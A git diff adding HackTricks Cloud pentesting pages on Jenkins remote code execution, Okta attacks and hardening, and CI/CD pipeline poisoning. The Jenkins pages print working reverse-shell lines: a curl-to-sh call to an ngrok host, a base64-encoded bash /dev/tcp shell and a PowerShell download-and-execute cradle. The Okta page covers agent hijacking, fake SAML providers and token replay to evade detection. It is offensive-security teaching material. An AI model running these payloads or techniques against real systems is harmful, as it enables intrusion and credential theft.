+{% endhint %} + +## Creating a new Pipeline + +In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:** + +![](<../../.gitbook/assets/image (235).png>) + +In the **Pipeline section** write the **reverse shell**: + +![](<../../.gitbook/assets/image (285).png>) + +```groovy +pipeline { + agent any + + stages { + stage('Hello') { + steps { + sh ''' + curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh + ''' + } + } + } +} +``` + +Finally click on **Save**, and **Build Now** and the pipeline will be executed: + +![](<../../.gitbook/assets/image (228).png>) + +## Modifying a Pipeline + +If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md new file mode 100644 index 0000000000..b11c7dcb32 --- /dev/null +++ b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md @@ -0,0 +1,62 @@ +# Jenkins RCE Creating/Modifying Project + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Creating a Project + +This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). + +1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob` +2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._ +3. Click **Build now** + 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *` + 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`** + +![](<../../.gitbook/assets/image (165).png>) + +## Modifying a Project + +Go to the projects and check **if you can configure any** of them (look for the "Configure button"): + +![](<../../.gitbook/assets/image (265).png>) + +If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others). + +Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`). 
+ +## Execution + +If you are allowed to configure the project you can **make it execute commands when a build is successful**: + +![](<../../.gitbook/assets/image (98).png>) + +Click on **Save** and **build** the project and your **command will be executed**.\ +If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md new file mode 100644 index 0000000000..786f873257 --- /dev/null +++ b/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md @@ -0,0 +1,89 @@ +# Jenkins RCE with Groovy Script + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Jenkins RCE with Groovy Script + +This is less noisy than creating a new project in Jenkins + +1. Go to _path\_jenkins/script_ +2. Inside the text box introduce the script + +```python +def process = "PowerShell.exe ".execute() +println "Found text ${process.text}" +``` + +You could execute a command using: `cmd.exe /c dir` + +In **linux** you can do: **`"ls /".execute().text`** + +If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload. + +**Another useful groovy script** is (replace \[INSERT COMMAND]): + +```python +def sout = new StringBuffer(), serr = new StringBuffer() +def proc = '[INSERT COMMAND]'.execute() +proc.consumeProcessOutput(sout, serr) +proc.waitForOrKill(1000) +println "out> $sout err> $serr" +``` + +### Reverse shell in linux + +```python +def sout = new StringBuffer(), serr = new StringBuffer() +def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute() +proc.consumeProcessOutput(sout, serr) +proc.waitForOrKill(1000) +println "out> $sout err> $serr" +``` + +### Reverse shell in windows + +You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: + +```python +scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')" +echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 +cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc +``` + +### Script + +You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py). 
+ +You can use MSF to get a reverse shell: + +``` +msf> use exploit/multi/http/jenkins_script_console +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/okta-security/README.md b/pentesting-ci-cd/okta-security/README.md new file mode 100644 index 0000000000..ebb5511bf4 --- /dev/null +++ b/pentesting-ci-cd/okta-security/README.md @@ -0,0 +1,143 @@ +# Okta Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices. + +The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to: + +* **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications. +* **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification. +* **Lifecycle Management**: Automates user account creation, update, and deactivation processes. +* **Universal Directory**: Enables centralized management of users, groups, and devices. +* **API Access Management**: Secures and manages access to APIs. + +These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena. + +{% hint style="danger" %} +The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**. 
+{% endhint %} + +{% hint style="success" %} +To perform a security review of an Okta environment you should ask for **administrator read-only access**. +{% endhint %} + +### Summary + +There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\ +These users can be inside **groups**.\ +There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)... + +Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application. + +{% hint style="danger" %} +The most powerful role is **Super Administrator**. + +If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**. +{% endhint %} + +## Attacks + +### Locating Okta Portal + +Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**. + +### Login in Okta via Kerberos + +If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. 
Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard. + +Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta. + +**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** + +### Hijacking Okta AD Agent + +This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key'). + +**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** + +### Hijacking AD As an Admin + +This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment. 
+ +**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** + +### Okta Fake SAML Provider + +**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** + +The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner. + +### Phishing Okta Portal with Evilgnix + +In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal. + +### Colleague Impersonation Attack + +The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**. + +Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change). + +Note that this impersoantion depends on how each application was condigured. 
Only the ones trusting the field you modified and accepting updates will be compromised.\ +Therefore, the app should have this field enabled if it exists: + +
+ +I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently). + +The best way to find out if you could impersonate anyone on each app would be to try it! + +## Evading behavioural detection policies + +Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page. + +Key recommendations include: + +* **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens. +* Ensure **consistent user-agent strings** between the client and replayed access tokens. +* **Refrain from replaying** tokens from different users from the same IP address. +* Exercise caution when replaying tokens against the Okta dashboard. +* If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic. + +## Okta Hardening + +Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible: + +{% content-ref url="okta-hardening.md" %} +[okta-hardening.md](okta-hardening.md) +{% endcontent-ref %} + +## References + +* [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers) +* [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/okta-security/okta-hardening.md b/pentesting-ci-cd/okta-security/okta-hardening.md new file mode 100644 index 0000000000..8061021637 --- /dev/null +++ b/pentesting-ci-cd/okta-security/okta-hardening.md @@ -0,0 +1,225 @@ +# Okta Hardening + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Directory + +### People + +From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs). + +For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**". + +### Groups + +This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\ +It's possible to see the **people included inside groups** and **apps assigned** to each group. + +Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members. + +From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3). + +### Devices + +Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not. + +### Profile Editor + +Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**. + +Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it). + +### Directory Integrations + +Directories allow you to import people from existing sources. 
I guess here you will see the users imported from other directories. + +I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**. + +### Profile Sources + +A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time. + +I haven't seen it, so any information about security and hacking regarding this option is appreciated. + +## Customizations + +### Brands + +Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know). + +Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL. + +### SMS + +Nothing interesting here. + +### End-User Dashboard + +You can find here applications configured, but we will see the details of those later in a different section. + +### Other + +Interesting setting, but nothing super interesting from a security point of view. + +## Applications + +### Applications + +Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application... + +In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots: + +
+ +And you could see some more details about the app (like the password reveal feature, if it's enabled): + +
+ +## Identity Governance + +### Access Certifications + +Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required. + +I haven't seen it used, but I guess that from a defensive point of view it's a nice feature. + +## Security + +### General + +* **Security notification emails**: All should be enabled. +* **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha +* **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok) +* **User enumeration prevention**: Both should be enabled + * Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information): + * Self-Service Registration + * JIT flows with email authentication +* **Okta ThreatInsight settings**: Log and enforce security based on threat level + +### HealthInsight + +Here is possible to find correctly and **dangerous** configured **settings**. + +### Authenticators + +Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong. + +In the **Enrollment** tab you can see how the ones that are required or optinal: + +
+ +It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn. + +### Authentication policies + +Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions. + +Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it. + +### Global Session Policy + +Here you can find the session policies assigned to different groups. For example: + +
+ +It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location. + +### Identity Providers + +Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card. + +On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain. + +**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment. + +### Delegated Authentication + +Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server. + +Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting. + +### Network + +A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations. + +After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**. 
+ +From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly. + +### Device Integrations + +* **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application. + * I haven't seen this used yet. TODO +* **Notification services**: I haven't seen this used yet. TODO + +### API + +You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**. + +The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API. + +There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them. + +## Workflow + +### Automations + +Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users. + +For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta". + +## Reports + +### Reports + +Download logs. They are **sent** to the **email address** of the current account. + +### System Log + +Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta. + +### Import Monitoring + +This can **import logs from the other platforms** accessed with Okta. + +### Rate limits + +Check the API rate limits reached. 
+ +## Settings + +### Account + +Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates. + +### Downloads + +Here you can download Okta agents to sync Okta with other technologies. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/pentesting-ci-cd/pentesting-ci-cd-methodology.md new file mode 100644 index 0000000000..58cde5a815 --- /dev/null +++ b/pentesting-ci-cd/pentesting-ci-cd-methodology.md @@ -0,0 +1,131 @@ +# Pentesting CI/CD Methodology + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +
+ +## VCS + +VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**: + +* Github +* Gitlab +* Bitbucket +* Gitea +* Cloud providers (they offer their own VCS platforms) + +## CI/CD Pipelines + +CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production. + +However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**. + +## VCS Pentesting Methodology + +{% hint style="info" %} +Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code. +{% endhint %} + +Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse: + +* **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks. +* **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**. + * **Register**: Some platforms will just allow external users to create an account. + * **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example). + * **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... 
there are several kind of tokens a user could steal to access in some way a repo. +* **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**. + * If no secret is in place, the attacker could abuse the webhook of the third party platform + * If the secret is in the URL, the same happens and the attacker also have the secret +* **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid: + * Compromise the main branch to **compromise production**. + * Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines). + * **Compromise the pipeline** (check next section) + +## Pipelines Pentesting Methodology + +The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\ +These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code. + +Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**. + +### PPE - Poisoned Pipeline Execution + +The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. 
Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands. + +For a malicious actor to be successful performing a PPE attack he needs to be able to: + +* Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access). + * Note that sometimes an **external PR count as "write access"**. +* Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**. + * For this, he might need to be able to **bypass branch protections**. + +There are 3 PPE flavours: + +* **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed. +* **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config). +* **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR. + * **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**. + +### Exploitation Benefits + +Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation: + +* **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) 
